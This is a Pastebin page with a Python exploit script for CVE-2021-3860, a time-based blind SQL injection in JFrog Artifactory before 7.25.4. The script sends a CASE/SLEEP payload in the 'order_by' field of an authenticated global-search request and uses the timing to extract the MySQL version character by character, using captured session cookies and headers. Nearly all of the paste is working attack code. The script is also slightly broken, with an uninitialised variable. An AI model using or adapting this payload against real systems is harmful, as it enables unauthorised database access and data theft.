API tools faq
paste
Advertisement
FlyFar

JFrog Artifactory < 7.25.4 - Blind SQL Injection - CVE-2021-3860

FlyFar
Feb 22nd, 2024
1,138
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.12 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: artifactory low-privileged blind sql injection
  2. # Google Dork:
  3. # Date:
  4. # Exploit Author: ardr
  5. # Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
  6. # Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
  7. # Version: JFrog Artifactory prior to 7.25.4
  8. # Tested on: MySQL
  9. # CVE : CVE-2021-3860
  10.  
  11. import requests, string, time
  12. from sys import stdout,exit
  13. import warnings
  14. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  15.  
  16. # written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
  17. # old script for CVE-2021-3860
  18. # log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
  19. # you will need to be able to capture a valid request to the below endpoint in order to run this script.
  20. # once captured, replace the cookies and headers below
  21.  
  22.  
  23. warnings.simplefilter('ignore',InsecureRequestWarning)
  24.  
  25.  
  26. session = requests.session()
  27. base = input("Please enter the base url: ")
  28. url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
  29. # headers = Replace this with captured headers from the above endpoint
  30. pos = 1
  31. # cookies = Replace this with captured cookies from the above endpoint
  32.  
  33.  
  34. while True:
  35.     for i in string.digits + '.':
  36.         data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
  37.         start = time.time()
  38.         r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
  39.         request_time = time.time() - start
  40.         if request_time > 5:
  41.             version += i
  42.             pos += 1
  43.             stdout.write(i)
  44.             stdout.flush()
  45.             break
  46.         if len(version) >= 6:
  47.             stdout.write("\n")
  48.             print(f"Version found: MySQL {version}")
  49.             exit(0)
  50.            
Tags: sql CVE Vulnerability blind ịnection JFrog
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!